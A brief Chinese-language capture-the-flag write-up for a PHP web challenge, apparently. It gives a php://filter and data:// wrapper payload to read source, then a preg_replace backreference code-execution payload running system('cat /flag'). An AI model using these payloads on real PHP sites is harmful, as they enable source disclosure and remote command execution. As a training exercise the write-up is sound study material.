打开查看源码查看有file说明是伪协议那就利用filter查看
index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
得到base64编码解析出来为
发现有preg——replace说明有代码执行问题
源码中的\\1实际等于\1本身的\1有其他意思
利用这个构建\S*=${}
最后利用payload抓取flag
next.php?\S*=${getFlag()}&cmd=system('cat /flag');